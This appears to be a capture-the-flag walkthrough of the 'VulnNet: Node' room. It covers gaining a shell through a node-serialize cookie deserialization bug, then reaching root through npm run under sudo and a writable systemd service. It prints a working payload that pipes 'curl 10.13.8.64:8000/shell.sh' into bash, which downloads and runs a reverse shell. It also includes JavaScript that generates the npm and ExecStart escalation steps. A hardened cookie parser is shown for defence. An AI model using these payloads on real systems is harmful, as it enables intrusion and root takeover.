# VulnNet: Node

![](/files/-MdTBxo-x93SKNxJfOzB)

## Scanning

Let's run an nmap scan to find open ports and services.

![](/files/-MdTC5_dgjjKGq3jPvX-)

## Enumeration

Let's visit the website on port 8080.

![](/files/-MdTCNU_pg6BjslImJNJ)

We have a Node.js webpage, and it lists some names we can use as candidate usernames:

*`Tilo Mitra, Eric Ferraioulo, Reid Burke and Andrew Wooldridge`*

Let's look for hidden directories with gobuster.

![](/files/-MdTDPEJilYhTlJr612F)

Let's look at the login page.

![](/files/-MdTDUTN8vqZ6FKQ3Pwx)

We have a login form but no credentials. Let's submit random credentials and inspect what the browser sends with Burp Suite.

Let's capture the request.

![](/files/-MdTE2u8g4DGemIoPzwR)

It looks like we already have a session cookie even though we have not logged in yet, which is interesting. Let's send this request to the Repeater tab and test different requests with the cookie we have.

First let's decode the cookie, since it looks `base64`-encoded.

![](/files/-MdTF-HNbTY9cnVpQatJ)

So the username is `Guest` and `isGuest` is set to `true`. I tried changing the username to admin and re-encoding the cookie, but that did not log us in, so let's see what the server shows when the cookie is malformed.

## Exploitation

![](/files/-MdTHCiT49Y-ImDCdSS9)

It looks like the web application tries to deserialize the session cookie and returns a stack trace when that fails. The `unserialize` in the trace points at the `node-serialize` package, so let's look for an exploit for it. I found a [blog](https://opsecx.com/index.php/2017/02/08/exploiting-node-js-deserialization-bug-for-remote-code-execution/) that explains this Node.js deserialization bug and shows how to exploit it.

Reading the blog, we find the exploit we will use.

![](/files/-MdTIQHLg2bH_uAPAquE)

The `_$$ND_FUNC$$_` prefix tells `unserialize()` that the string is a serialized function, and the library hands the rest of the string to `eval()`. Appending `()` to the function expression turns it into an immediately invoked function, so the code runs during deserialization, before the application ever checks the username or the `isGuest` flag. So let's try to get a shell on the box: we create a reverse shell script on our machine so that the server can curl it and pipe it to bash.

![](/files/-MdTJlKIy1Z4UG4y8Wty)

Next we change the payload slightly so that it gives us a reverse shell:

```
{"username":"_$$ND_FUNC$$_function (){\n \t require('child_process').exec('curl 10.13.8.64:8000/shell.sh | bash ', function(error, stdout, stderr) { console.log(stdout) });\n }()","isAdmin":true,"encoding": "utf-8"}
```
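To see why the cookie above is enough for code execution, here is an added example (our code, not the room's application and not `node-serialize` itself) that re-creates the `unserialize()` pattern the library uses: parse the JSON, then `eval()` any string tagged `_$$ND_FUNC$$_`. The `curl ... | bash` body from the real payload is swapped for a harmless marker so the effect can be observed in-process, and a hardened parser that treats the cookie as data only is shown beside it. Function names, the marker variable and the sample cookies are our assumptions.

```javascript
// Added example, not code from the room or from node-serialize. It re-creates
// the node-serialize unserialize() pattern (JSON.parse, then eval() of any
// string tagged _$$ND_FUNC$$_) so the cookie-to-RCE path can be run offline.
const FUNCFLAG = '_$$ND_FUNC$$_';

function decodeCookie(cookieB64) {
  // The session cookie is just base64 of a JSON document.
  return JSON.parse(Buffer.from(cookieB64, 'base64').toString('utf8'));
}

function encodeCookie(sessionObj) {
  return Buffer.from(JSON.stringify(sessionObj), 'utf8').toString('base64');
}

// VULNERABLE: mirrors how node-serialize revives functions. Every string value
// that starts with the flag is passed to eval(). When the attacker appends "()"
// to the function expression it becomes an IIFE and runs right here, before
// the application ever looks at username or isGuest.
function unsafeUnserialize(cookieB64) {
  const obj = decodeCookie(cookieB64);
  for (const key of Object.keys(obj)) {
    const v = obj[key];
    if (typeof v === 'string' && v.startsWith(FUNCFLAG)) {
      obj[key] = eval('(' + v.slice(FUNCFLAG.length) + ')');
    }
  }
  return obj;
}

// HARDENED: treat the cookie as data only. No eval, no function revival, and
// the result is rebuilt from the fields we expect with the types we expect.
function safeParseSession(cookieB64) {
  const obj = decodeCookie(cookieB64);
  if (typeof obj !== 'object' || obj === null || Array.isArray(obj)) {
    throw new Error('session is not an object');
  }
  if (typeof obj.username !== 'string' || typeof obj.isGuest !== 'boolean') {
    throw new Error('unexpected session shape');
  }
  if (obj.username.includes(FUNCFLAG)) {
    throw new Error('function marker in session data');
  }
  return { username: obj.username, isGuest: obj.isGuest };
}

// Build a cookie shaped like the walkthrough's payload but with our own body.
function buildFuncPayloadCookie(jsBody) {
  const fn = `${FUNCFLAG}function (){ ${jsBody} }()`;
  return encodeCookie({ username: fn, isGuest: false, encoding: 'utf-8' });
}

// Constructed guest cookie, matching what the decoded Burp cookie showed.
const guestCookie = encodeCookie({ username: 'Guest', isGuest: true, encoding: 'utf-8' });

function runDemo() {
  globalThis.__ndFuncMarker = false;
  // In the room the body was require('child_process').exec('curl 10.13.8.64:8000/shell.sh | bash', ...)
  const rceCookie = buildFuncPayloadCookie('globalThis.__ndFuncMarker = true; return "executed";');

  const guest = safeParseSession(guestCookie);
  let safeRejected = false;
  try { safeParseSession(rceCookie); } catch (e) { safeRejected = true; }
  if (globalThis.__ndFuncMarker) throw new Error('hardened parser must not execute anything');

  const unsafe = unsafeUnserialize(rceCookie); // eval() runs the payload here
  return {
    guest,
    unsafeUsername: unsafe.username,        // the IIFE's return value replaced the string
    markerHit: globalThis.__ndFuncMarker,   // true: code ran during deserialization
    safeRejected,
  };
}

console.log(JSON.stringify(runDemo(), null, 2));
```

Note that the hardened parser never needs to "detect" the marker to be safe: it is safe because it never calls `eval()`; the marker check only gives a clearer error. If an application genuinely needs functions in a session, that is a sign the session should hold an identifier into server-side state instead.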

Next we start an HTTP server on our machine and a netcat listener.

![](/files/-MdTKVQJPZ6swLWh-0wU)

Let's base64-encode the payload and then replace the current cookie value with it.

![](/files/-MdTLGdTRxO40yGH06YM)

Now let's replace the cookie and send the request.

![](/files/-MdTLPkMqXudDehECoDa)

The file should get downloaded.

![](/files/-MdTLUIudeX_TvBb9hpd)

And we should have a reverse shell.

![](/files/-MdTLZdLT0s71mePaqdJ)

## Privilege Escalation

Let's run `sudo -l` to see what we can run with sudo.

![](/files/-MdTMGViwHWXtKua6VC3)

We can run `npm` as `serv-manage`. Let's look at [GTFOBins](https://gtfobins.github.io/gtfobins/npm/#sudo) for the commands to turn that into a shell as `serv-manage`.

![](/files/-MdTMdxPfhI6kBbbGwbq)

Let's run these commands.

![](/files/-MdTOBXe4Nq6_del9d85)

We are now `serv-manage` and can read the user flag.

![](/files/-MdTOM3pwh8H4O_7fpqg)

Let's run `sudo -l` again.

![](/files/-MdTPSkiugO0KsLlmUiZ)

Looks like we can stop and start a systemd timer called `vulnnet-auto.timer` with sudo. Let's look at this unit file.

![](/files/-MdTPqUjbFJjnJx0Wc4x)

A timer does not run commands itself: when it fires it activates the service named in its `Unit=` line, here `vulnnet-job.service`, and that service runs as root. Let's see whether we can modify that file and what it contains.

![](/files/-MdTQG2UJMXsPSoDOPWV)

We can write to the file. Let's replace the command in its `ExecStart=` line with the same reverse shell we used before, so that when the service runs we get a shell as root.

![](/files/-MdTT-NgUek2GSki9o3L)

Let's start a netcat listener, and the HTTP server again if you stopped it.

![](/files/-MdTTAGq6HvMDvDI9EFF)

Now let's stop and start the timer so that it triggers the modified service. If systemd warns that the unit file changed on disk, it needs a `daemon-reload` before the new `ExecStart=` is used.

![](/files/-MdTWMHFzVMWeQYZp_8p)

![](/files/-MdTWRU331H5PPw0NSsg)

We are now root and can read the root flag.

![](/files/-MdTWafdNwrR28witkWY)
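As an added example (ours, not the room's and not from GTFOBins), the two sudo primitives used in this section as payload generators, so the package file, the patched unit and the exact commands can be checked before touching the box. JavaScript is used because it is the language already on the page; nothing here runs `sudo` or `systemctl`, it only produces files and command lines. The user name `serv-manage`, the unit names `vulnnet-auto.timer` and `vulnnet-job.service` and the attacker address `10.13.8.64:8000` come from the walkthrough; the function names, the default `/bin/sh` preinstall command and the sample unit texts are our assumptions.

```javascript
// Added example, not from the room. Pure functions that build the npm and
// systemd payloads used in the privilege escalation; nothing here runs sudo.
// serv-manage, vulnnet-auto.timer, vulnnet-job.service and 10.13.8.64:8000
// are from the walkthrough; the function names and sample units are ours.

// --- step 1: npm as serv-manage (GTFOBins npm/sudo) -----------------------
// npm runs package.json lifecycle scripts as the user invoking npm, so a
// preinstall script under `sudo -u serv-manage npm -C <dir> i` runs as that user.
function npmPreinstallPackage(command = '/bin/sh') {
  return JSON.stringify({ scripts: { preinstall: command } });
}

function npmEscalationCommands(dir, user = 'serv-manage') {
  return [
    `mkdir -p ${dir}`,
    `echo '${npmPreinstallPackage()}' > ${dir}/package.json`,
    `sudo -u ${user} npm -C ${dir} i`,
  ];
}

// --- step 2: writable unit behind a sudo-controllable timer ---------------
// A .timer never runs a command itself: it activates the unit named by Unit=
// in its [Timer] section, or the .service with the same base name if absent.
function timerTarget(timerText, timerName) {
  const m = timerText.match(/^\s*Unit=(.+)$/m);
  return m ? m[1].trim() : timerName.replace(/\.timer$/, '.service');
}

// Swap the ExecStart= line of a service unit. ExecStart needs an absolute
// executable path, so a shell pipeline must be wrapped in /bin/bash -c '...'.
function replaceExecStart(unitText, newCommand) {
  let replaced = 0;
  const out = unitText.split('\n').map((line) => {
    if (/^\s*ExecStart=/.test(line)) { replaced += 1; return `ExecStart=${newCommand}`; }
    return line;
  });
  if (replaced !== 1) throw new Error(`expected exactly one ExecStart=, found ${replaced}`);
  return out.join('\n');
}

// systemd only re-reads a changed unit file after daemon-reload. The stop/start
// in the walkthrough was enough; if sudo -l also allows daemon-reload, run it first.
function systemctlTriggerCommands(timer = 'vulnnet-auto.timer') {
  return [
    'sudo systemctl daemon-reload',
    `sudo systemctl stop ${timer}`,
    `sudo systemctl start ${timer}`,
  ];
}

// Same fetch-and-run reverse shell as the web stage, wrapped for ExecStart.
const reverseShell = "/bin/bash -c 'curl 10.13.8.64:8000/shell.sh | bash'";

// Constructed sample units standing in for the real files on the box.
const sampleTimer = ['[Unit]', 'Description=constructed sample timer', '', '[Timer]',
  'OnBootSec=1min', 'Unit=vulnnet-job.service', '', '[Install]', 'WantedBy=timers.target'].join('\n');
const sampleJob = ['[Unit]', 'Description=constructed sample job', '', '[Service]',
  'Type=oneshot', 'ExecStart=/bin/echo original', '', '[Install]', 'WantedBy=multi-user.target'].join('\n');

function buildEscalationPlan() {
  return {
    npm: npmEscalationCommands('/tmp/npmesc'),
    serviceToPatch: timerTarget(sampleTimer, 'vulnnet-auto.timer'),
    patchedUnit: replaceExecStart(sampleJob, reverseShell),
    trigger: systemctlTriggerCommands(),
  };
}

console.log(JSON.stringify(buildEscalationPlan(), null, 2));
```

`replaceExecStart` refuses units with zero or several `ExecStart=` lines on purpose: a `Type=oneshot` service may chain several, and silently rewriting only one of them is how a payload ends up never running.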


